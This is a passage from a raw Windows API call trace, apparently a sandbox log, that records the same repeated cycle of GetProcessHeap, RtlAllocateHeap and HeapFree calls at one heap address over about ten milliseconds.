Size=0x80) returned 0x4f707c8 [0060.904] GetProcessHeap () returned 0x4f10000 [0060.904] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.904] GetProcessHeap () returned 0x4f10000 [0060.904] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.904] GetProcessHeap () returned 0x4f10000 [0060.904] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.904] GetProcessHeap () returned 0x4f10000 [0060.904] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.904] GetProcessHeap () returned 0x4f10000 [0060.904] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.904] GetProcessHeap () returned 0x4f10000 [0060.904] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.904] GetProcessHeap () returned 0x4f10000 [0060.904] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.904] GetProcessHeap () returned 0x4f10000 [0060.904] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.904] GetProcessHeap () returned 0x4f10000 [0060.904] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.904] GetProcessHeap () returned 0x4f10000 [0060.905] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.905] GetProcessHeap () returned 0x4f10000 [0060.905] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.905] GetProcessHeap () returned 0x4f10000 [0060.905] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.905] GetProcessHeap () returned 0x4f10000 [0060.905] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.905] GetProcessHeap () returned 0x4f10000 [0060.905] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.905] GetProcessHeap () returned 0x4f10000 [0060.905] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.905] GetProcessHeap () returned 0x4f10000 [0060.905] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.905] GetProcessHeap () returned 0x4f10000 [0060.905] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.905] GetProcessHeap () returned 0x4f10000 [0060.905] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.905] GetProcessHeap () returned 0x4f10000 [0060.905] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.905] GetProcessHeap () returned 0x4f10000 [0060.905] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.905] GetProcessHeap () returned 0x4f10000 [0060.905] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.905] GetProcessHeap () returned 0x4f10000 [0060.905] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.905] GetProcessHeap () returned 0x4f10000 [0060.905] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.905] GetProcessHeap () returned 0x4f10000 [0060.905] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.905] GetProcessHeap () returned 0x4f10000 [0060.905] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.905] GetProcessHeap () returned 0x4f10000 [0060.905] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.905] GetProcessHeap () returned 0x4f10000 [0060.905] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.905] GetProcessHeap () returned 0x4f10000 [0060.905] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.905] GetProcessHeap () returned 0x4f10000 [0060.906] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.906] GetProcessHeap () returned 0x4f10000 [0060.906] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.906] GetProcessHeap () returned 0x4f10000 [0060.906] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.906] GetProcessHeap () returned 0x4f10000 [0060.906] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.906] GetProcessHeap () returned 0x4f10000 [0060.906] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.906] GetProcessHeap () returned 0x4f10000 [0060.906] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.906] GetProcessHeap () returned 0x4f10000 [0060.906] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.906] GetProcessHeap () returned 0x4f10000 [0060.906] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.906] GetProcessHeap () returned 0x4f10000 [0060.906] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.906] GetProcessHeap () returned 0x4f10000 [0060.906] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.906] GetProcessHeap () returned 0x4f10000 [0060.906] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.906] GetProcessHeap () returned 0x4f10000 [0060.906] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.906] GetProcessHeap () returned 0x4f10000 [0060.906] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.906] GetProcessHeap () returned 0x4f10000 [0060.906] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.906] GetProcessHeap () returned 0x4f10000 [0060.906] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.906] GetProcessHeap () returned 0x4f10000 [0060.906] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.906] GetProcessHeap () returned 0x4f10000 [0060.906] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.906] GetProcessHeap () returned 0x4f10000 [0060.906] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.906] GetProcessHeap () returned 0x4f10000 [0060.906] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.907] GetProcessHeap () returned 0x4f10000 [0060.907] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.907] GetProcessHeap () returned 0x4f10000 [0060.907] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.907] GetProcessHeap () returned 0x4f10000 [0060.907] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.907] GetProcessHeap () returned 0x4f10000 [0060.907] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.907] GetProcessHeap () returned 0x4f10000 [0060.907] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.907] GetProcessHeap () returned 0x4f10000 [0060.907] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.907] GetProcessHeap () returned 0x4f10000 [0060.907] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.907] GetProcessHeap () returned 0x4f10000 [0060.907] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.907] GetProcessHeap () returned 0x4f10000 [0060.907] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.907] GetProcessHeap () returned 0x4f10000 [0060.907] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.907] GetProcessHeap () returned 0x4f10000 [0060.907] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.907] GetProcessHeap () returned 0x4f10000 [0060.907] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.907] GetProcessHeap () returned 0x4f10000 [0060.907] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.907] GetProcessHeap () returned 0x4f10000 [0060.907] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.907] GetProcessHeap () returned 0x4f10000 [0060.907] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.907] GetProcessHeap () returned 0x4f10000 [0060.907] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.907] GetProcessHeap () returned 0x4f10000 [0060.907] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.907] GetProcessHeap () returned 0x4f10000 [0060.907] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.908] GetProcessHeap () returned 0x4f10000 [0060.908] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.908] GetProcessHeap () returned 0x4f10000 [0060.908] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.908] GetProcessHeap () returned 0x4f10000 [0060.908] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.908] GetProcessHeap () returned 0x4f10000 [0060.908] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.908] GetProcessHeap () returned 0x4f10000 [0060.908] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.908] GetProcessHeap () returned 0x4f10000 [0060.908] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.908] GetProcessHeap () returned 0x4f10000 [0060.908] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.908] GetProcessHeap () returned 0x4f10000 [0060.908] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.908] GetProcessHeap () returned 0x4f10000 [0060.908] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.908] GetProcessHeap () returned 0x4f10000 [0060.908] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.908] GetProcessHeap () returned 0x4f10000 [0060.908] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.908] GetProcessHeap () returned 0x4f10000 [0060.908] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.908] GetProcessHeap () returned 0x4f10000 [0060.908] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.908] GetProcessHeap () returned 0x4f10000 [0060.908] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.908] GetProcessHeap () returned 0x4f10000 [0060.908] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.908] GetProcessHeap () returned 0x4f10000 [0060.908] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.908] GetProcessHeap () returned 0x4f10000 [0060.908] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.908] GetProcessHeap () returned 0x4f10000 [0060.908] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.908] GetProcessHeap () returned 0x4f10000 [0060.908] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.909] GetProcessHeap () returned 0x4f10000 [0060.909] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.909] GetProcessHeap () returned 0x4f10000 [0060.909] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.909] GetProcessHeap () returned 0x4f10000 [0060.909] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.909] GetProcessHeap () returned 0x4f10000 [0060.909] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.909] GetProcessHeap () returned 0x4f10000 [0060.909] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.909] GetProcessHeap () returned 0x4f10000 [0060.909] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.909] GetProcessHeap () returned 0x4f10000 [0060.909] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.909] GetProcessHeap () returned 0x4f10000 [0060.909] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.909] GetProcessHeap () returned 0x4f10000 [0060.909] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.909] GetProcessHeap () returned 0x4f10000 [0060.909] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.909] GetProcessHeap () returned 0x4f10000 [0060.909] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.909] GetProcessHeap () returned 0x4f10000 [0060.909] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.909] GetProcessHeap () returned 0x4f10000 [0060.909] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.909] GetProcessHeap () returned 0x4f10000 [0060.909] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.909] GetProcessHeap () returned 0x4f10000 [0060.909] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.909] GetProcessHeap () returned 0x4f10000 [0060.909] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.909] GetProcessHeap () returned 0x4f10000 [0060.909] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.909] GetProcessHeap () returned 0x4f10000 [0060.909] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.909] GetProcessHeap () returned 0x4f10000 [0060.909] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.909] GetProcessHeap () returned 0x4f10000 [0060.910] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.910] GetProcessHeap () returned 0x4f10000 [0060.910] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.910] GetProcessHeap () returned 0x4f10000 [0060.910] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.910] GetProcessHeap () returned 0x4f10000 [0060.910] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.910] GetProcessHeap () returned 0x4f10000 [0060.910] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.910] GetProcessHeap () returned 0x4f10000 [0060.910] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.910] GetProcessHeap () returned 0x4f10000 [0060.910] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.910] GetProcessHeap () returned 0x4f10000 [0060.910] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.910] GetProcessHeap () returned 0x4f10000 [0060.910] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.910] GetProcessHeap () returned 0x4f10000 [0060.910] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.911] GetProcessHeap () returned 0x4f10000 [0060.911] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.911] GetProcessHeap () returned 0x4f10000 [0060.911] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.911] GetProcessHeap () returned 0x4f10000 [0060.911] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.911] GetProcessHeap () returned 0x4f10000 [0060.911] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.911] GetProcessHeap () returned 0x4f10000 [0060.911] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.911] GetProcessHeap () returned 0x4f10000 [0060.911] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.911] GetProcessHeap () returned 0x4f10000 [0060.911] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.911] GetProcessHeap () returned 0x4f10000 [0060.911] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.911] GetProcessHeap () returned 0x4f10000 [0060.911] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.911] GetProcessHeap () returned 0x4f10000 [0060.911] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.911] GetProcessHeap () returned 0x4f10000 [0060.911] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.911] GetProcessHeap () returned 0x4f10000 [0060.911] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.911] GetProcessHeap () returned 0x4f10000 [0060.911] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.911] GetProcessHeap () returned 0x4f10000 [0060.911] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.911] GetProcessHeap () returned 0x4f10000 [0060.911] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.911] GetProcessHeap () returned 0x4f10000 [0060.911] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.911] GetProcessHeap () returned 0x4f10000 [0060.911] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.911] GetProcessHeap () returned 0x4f10000 [0060.911] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.911] GetProcessHeap () returned 0x4f10000 [0060.912] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.912] GetProcessHeap () returned 0x4f10000 [0060.912] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.912] GetProcessHeap () returned 0x4f10000 [0060.912] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.912] GetProcessHeap () returned 0x4f10000 [0060.912] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.912] GetProcessHeap () returned 0x4f10000 [0060.912] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.912] GetProcessHeap () returned 0x4f10000 [0060.912] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.912] GetProcessHeap () returned 0x4f10000 [0060.912] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.912] GetProcessHeap () returned 0x4f10000 [0060.912] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.912] GetProcessHeap () returned 0x4f10000 [0060.912] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.912] GetProcessHeap () returned 0x4f10000 [0060.912] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.912] GetProcessHeap () returned 0x4f10000 [0060.912] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.912] GetProcessHeap () returned 0x4f10000 [0060.912] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.912] GetProcessHeap () returned 0x4f10000 [0060.912] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.912] GetProcessHeap () returned 0x4f10000 [0060.912] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.912] GetProcessHeap () returned 0x4f10000 [0060.912] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.912] GetProcessHeap () returned 0x4f10000 [0060.912] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.912] GetProcessHeap () returned 0x4f10000 [0060.912] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.912] GetProcessHeap () returned 0x4f10000 [0060.912] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.912] GetProcessHeap () returned 0x4f10000 [0060.912] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.912] GetProcessHeap () returned 0x4f10000 [0060.913] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.913] GetProcessHeap () returned 0x4f10000 [0060.913] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.913] GetProcessHeap () returned 0x4f10000 [0060.913] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.913] GetProcessHeap () returned 0x4f10000 [0060.913] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.913] GetProcessHeap () returned 0x4f10000 [0060.913] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.913] GetProcessHeap () returned 0x4f10000 [0060.913] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.913] GetProcessHeap () returned 0x4f10000 [0060.913] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.913] GetProcessHeap () returned 0x4f10000 [0060.913] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.913] GetProcessHeap () returned 0x4f10000 [0060.913] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.913] GetProcessHeap () returned 0x4f10000 [0060.913] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.913] GetProcessHeap () returned 0x4f10000 [0060.913] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.913] GetProcessHeap () returned 0x4f10000 [0060.913] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.913] GetProcessHeap () returned 0x4f10000 [0060.913] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.913] GetProcessHeap () returned 0x4f10000 [0060.913] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.913] GetProcessHeap () returned 0x4f10000 [0060.913] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.913] GetProcessHeap () returned 0x4f10000 [0060.913] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.913] GetProcessHeap () returned 0x4f10000 [0060.913] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.913] GetProcessHeap () returned 0x4f10000 [0060.913] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.913] GetProcessHeap () returned 0x4f10000 [0060.913] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.913] GetProcessHeap () returned 0x4f10000 [0060.914] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.914] GetProcessHeap () returned 